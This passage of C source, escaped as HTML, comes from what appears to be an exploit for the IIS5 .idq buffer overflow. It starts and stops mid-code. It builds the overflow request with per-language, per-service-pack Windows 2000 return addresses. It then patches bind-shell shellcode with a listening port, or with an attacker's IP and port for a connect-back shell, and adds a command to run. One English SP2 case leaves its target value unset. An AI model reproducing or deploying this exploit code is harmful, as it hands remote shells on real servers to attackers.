// high byte of wValue ends up in the upper 16 bits of the result and the unit
// for the low byte in the lower 16 bits.
//
// wValue:  16-bit value to encode (the callers pass port numbers and IP halves).
// Returns: the 32-bit encoding described above.
DWORD Convert_Ansi_Word_To_Sk_Long(WORD wValue)
{
  int iReservCount, i;
  WORD wTemp;
  DWORD dwRetValue = 0;
  BOOL bFirst=true;   // first pass encodes the high byte, second pass the low byte

  iReservCount = sizeof(byReservedValue)/sizeof(BYTE);

  // Exactly two passes: the second pass ends in the break at the bottom.
  while(1){
    wTemp = wValue&amp;0xff00;   // isolate the current high byte ...
    wTemp &gt;&gt;= 8;             // ... and move it down to bits 0..7
    for( i=0; i&lt;iReservCount; i++){
      if( wTemp == byReservedValue[i]) break;
    }
    if( i == iReservCount)
      wTemp |= 0x0100;        // not reserved: tag 0x01, byte unchanged
    else{
      wTemp++;                // reserved: bump the byte and tag 0x02
      wTemp |= 0x0200;
    }
    dwRetValue |= wTemp;
    
    if( bFirst){
      bFirst = false;
      dwRetValue &lt;&lt;= 16;      // make room for the low-byte unit
      wValue &lt;&lt;=8;            // WORD shift: the original low byte is now the high byte
    }
    else
      break;
  }
  return dwRetValue;
}


typedef void (*SkRunPointer)();

//生成我的 IIS5 idq shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd)
{
  char szBuf[2048];
  char szOutput[10000], szCreateCode[10000];
  char *p;

  DWORD dwGetModuleHandle = 0, dwGetProcAddress=0, dwRetJmpEbx=0;
  WORD wSelectValue = MAX_SYSTEM_TYPE_NUM;

  switch( SystemType){
  case IIS5_WIN2K_CHINESE_SP0:
    wSelectValue = IIS5_WIN2K_CHINESE_SP0;
    break;
  case IIS5_WIN2K_CHINESE_SP1:
    wSelectValue = IIS5_WIN2K_CHINESE_SP1;
    break;
  case IIS5_WIN2K_CHINESE_SP2:
    wSelectValue = IIS5_WIN2K_CHINESE_SP2;
    break;

  case IIS5_WIN2K_ENGLISH_SP0:
    wSelectValue = IIS5_WIN2K_ENGLISH_SP0;
    break;
  case IIS5_WIN2K_ENGLISH_SP1:
    wSelectValue = IIS5_WIN2K_ENGLISH_SP1;
    break;
  case IIS5_WIN2K_ENGLISH_SP2:
    break;

  case IIS5_WIN2K_JAPANESE_SP0:
    wSelectValue = IIS5_WIN2K_JAPANESE_SP0;
    break;
  case IIS5_WIN2K_JAPANESE_SP1:
    wSelectValue = IIS5_WIN2K_JAPANESE_SP1;
    break;
  case IIS5_WIN2K_JAPANESE_SP2:
    wSelectValue = IIS5_WIN2K_JAPANESE_SP2;
    break;

  case IIS_WIN2K_MEXICO_SP0:
    wSelectValue = IIS_WIN2K_MEXICO_SP0;
    break;
  case IIS_WIN2K_MEXICO_SP1:
    wSelectValue = IIS_WIN2K_MEXICO_SP1;
    break;
  case IIS_WIN2K_MEXICO_SP2:
    wSelectValue = IIS_WIN2K_MEXICO_SP2;
    break;
  default:
    break;
  }

  if( wSelectValue &gt;= MAX_SYSTEM_TYPE_NUM) return 0;

  dwGetModuleHandle = AllSystemFuncAddr[wSelectValue].dwGetModuleHandle;
  dwGetProcAddress = AllSystemFuncAddr[wSelectValue].dwGetProcAddress;
  dwRetJmpEbx = AllSystemFuncAddr[wSelectValue].dwRetJmpEbxAddr;

  if( dwGetModuleHandle == 0) return 0;

  memset( szBuf, 1, sizeof(szBuf));
  memcpy( szBuf, szSnakeSign, strlen(szSnakeSign));
  p = &amp;(szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2]);
</PRE><PRE>  wsprintf( p,"%s", forwardjump);
  p += strlen((char *)forwardjump);
  *p++ = 1;
  *p++ = '%';
  *p++ = 'u';
  wsprintf( p, "%04x", (dwRetJmpEbx&gt;&gt;0)&amp;0xffff);
  p += 4;
  *p ++ = '%';
  *p ++ = 'u';
  wsprintf( p, "%04x", (dwRetJmpEbx&gt;&gt;16)&amp;0xffff);
  p += 4;
  *p++ = 1;
  wsprintf( p, "%s", jump_to_shell);

  //wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nShell: %s\r\n\r\n", szBuf, szMyCode);
  wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nSnake: ", szBuf);

  memcpy( szCreateCode, szSnakeBindShellCode, sizeof(szSnakeBindShellCode));


  //将地址信息, 端口信息 写入 shellcode代码.
  DWORD *pdw, dwTemp;
  WORD wTemp;
  char *lpsz, szExecTemp[wExecCommandSize];

  //Init Value.
  switch( pConnectStruct-&gt;byConnectType){
  case LISTEN_ON_PORT:
    szCreateCode[dwConnectType_Offset] = LISTEN_ON_PORT;
    dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct-&gt;wListenPort);
    lpsz = &amp;( szCreateCode[dwListenPort_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set listen port.
    break;
  case CONNECT_TO_HOST:
    szCreateCode[dwConnectType_Offset] = CONNECT_TO_HOST;
    
    wTemp = (WORD)( (pConnectStruct-&gt;dwConnectIP) &amp; 0xffff);
    dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
    lpsz = &amp;( szCreateCode[dwConnectIP2_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set IP1.

    wTemp = (WORD)( ((pConnectStruct-&gt;dwConnectIP) &amp; 0xffff0000) &gt;&gt; 16);
    dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
    lpsz = &amp;( szCreateCode[dwConnectIP1_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set IP2.

    dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct-&gt;wConnectPort);
    lpsz = &amp;( szCreateCode[dwConnectPort_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set connect Port.
    break;
  default:
    return 0;
  }

  lpsz = &amp;( szCreateCode[dwGetModuleHandle_Offset]);
  pdw = (DWORD *)lpsz;
  *pdw = dwGetModuleHandle; //set dwGetModuleHandle.

  lpsz = &amp;( szCreateCode[dwGetProcAddress_Offset]);
  pdw = (DWORD *)lpsz;
  *pdw = dwGetProcAddress; //set dwGetProcAddress.

  memset( szExecTemp, '+', wExecCommandSize);
  wTemp = strlen( lpszBindCmd);
  if(wTemp &gt;= wExecCommandSize)
    wTemp = wExecCommandSize-1;
  strncpy( szExecTemp, lpszBindCmd, wTemp);
